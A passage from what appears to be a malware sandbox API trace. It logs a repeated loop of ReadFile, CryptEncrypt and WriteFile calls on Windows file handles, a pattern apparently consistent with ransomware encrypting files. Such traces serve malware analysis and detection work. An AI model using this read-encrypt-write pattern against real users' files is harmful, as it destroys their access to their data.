(in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.896] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.896] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.896] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.896] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.896] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.896] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.896] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.896] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.897] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.897] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.897] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.897] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.897] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.897] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.897] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.897] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.897] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.897] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.897] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.897] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.897] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.897] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.897] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.897] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.897] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.897] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.897] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.898] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.898] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.898] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.898] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.898] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.898] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.898] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.898] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.898] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.898] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.898] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.898] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.898] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.898] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.898] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.898] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.898] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.898] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.899] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.899] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.899] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.899] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.899] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.899] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.899] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.899] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.899] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.899] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.899] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.899] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.899] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.899] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.899] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.899] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.899] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.899] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.899] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.899] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.900] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.900] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.900] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.900] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.900] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.900] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.900] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.900] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.900] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.900] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.900] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.900] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.900] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.900] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.900] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.900] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.900] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.900] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.901] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.901] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.901] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.901] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.901] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.901] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.901] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.901] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.901] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.901] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.901] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.901] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.901] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.901] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.901] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.901] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.901] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.901] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.902] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.902] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.902] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.902] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.902] CryptEncrypt (in: 